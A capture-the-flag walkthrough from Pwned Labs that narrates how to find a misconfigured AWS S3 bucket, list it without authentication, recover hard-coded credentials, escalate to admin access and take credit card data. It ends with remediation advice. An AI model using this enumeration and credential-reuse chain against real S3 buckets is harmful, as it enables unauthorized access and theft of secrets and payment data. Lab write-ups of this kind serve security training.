S3 Enumeration Basics
A walkthrough demonstrating how to enumerate S3, exploit a misconfiguration, and escalate privileges to obtain sensitive data.
Last updated
A walkthrough demonstrating how to enumerate S3, exploit a misconfiguration, and escalate privileges to obtain sensitive data.
Last updated
CTF Source: Pwned Labs
In this walkthrough, we're provided with a website link. After discovering the site is hosted on AWS S3, we'll learn how to enumerate S3 and, due to a misconfiguration, uncover additional credentials leading to the compromise of several secrets and credit card data.
Install awscli: (brew/apt) install awscli
We'll start by visiting the website in our browser and inspecting its source code.
We'll discover the website is retrieving content from S3.
If we attempt to navigate to the CSS file, we'll discover we can see it.
Let's try to traverse the directories of this bucket to see if we can access other files.
Let's try using the awscli like so.
--no-sign-request is needed so we’re not signing the request with any local AWS credentials
Okay, now we're noticing some files!
It doesn't appear we can list contents for anything but shared/
Let's attempt to download this file.
Nice! Let's open it up and see what we can find.
Unzipping the file
Reading the contents
We found some creds!
We can use the command aws configure and set up the credentials we just found.
Let's try to enumerate those admin files we found previously.
Okay, we're getting somewhere. Can we download the data?
Nope... Let's move on to those migration-files and try that.
Nice! Let's read the files.
Looks like we found several credentials for various systems! Let's test out the AWS IT Admin creds.
Again, we'll set up our credentials like so,
Let's try to download those admin files now.
Success! We found the flag! Likewise, if we download the other file, website_transactions_export.csv we'll uncover some plaintext credit card information!
In this scenario, unauthorized access was obtained to a shared folder within the S3 bucket without authentication. Subsequently, a zip file was downloaded from this folder, revealing a script embedded with hard-coded AWS credentials. These credentials were leveraged to access the /migration-files/ folder, where a file containing additional hard-coded credentials, including those for the AWS IT Admin user, was retrieved. Utilizing the IT Admin credentials, we successfully obtained the flag and plaintext credit card data from the /admin/ directory of the S3 bucket.
Let's discuss a few issues we uncovered along the way,
Multi-use of an S3 bucket
It's clear that this bucket was used for multiple purposes (website hosting, credit card data storage, and some sort of secrets management migration)
Multi-use of a bucket like this can lead to unintentional consequences as we uncovered
Recommendation:
Separate buckets should be utilized for different use cases to reduce the likelihood of permission misconfiguration
Mishandling of credit card data
The credit card data found was unencrypted and not stored in an appropriate location
Recommendation:
Encrypt credit card data
Store this data in an appropriate location and restrict access
World-readable shared directory
This directory was accessible by anyone and contained hard-coded secrets to several solutions.
The exposed secrets enabled privilege escalation, ultimately leading to the exfiltration of credit card data.
Recommendation:
Store this data in an appropriate location and restrict access
If the data needs to be shared externally, consider enabling cross-account access via an IAM Role or sharing in an alternative secure solution.
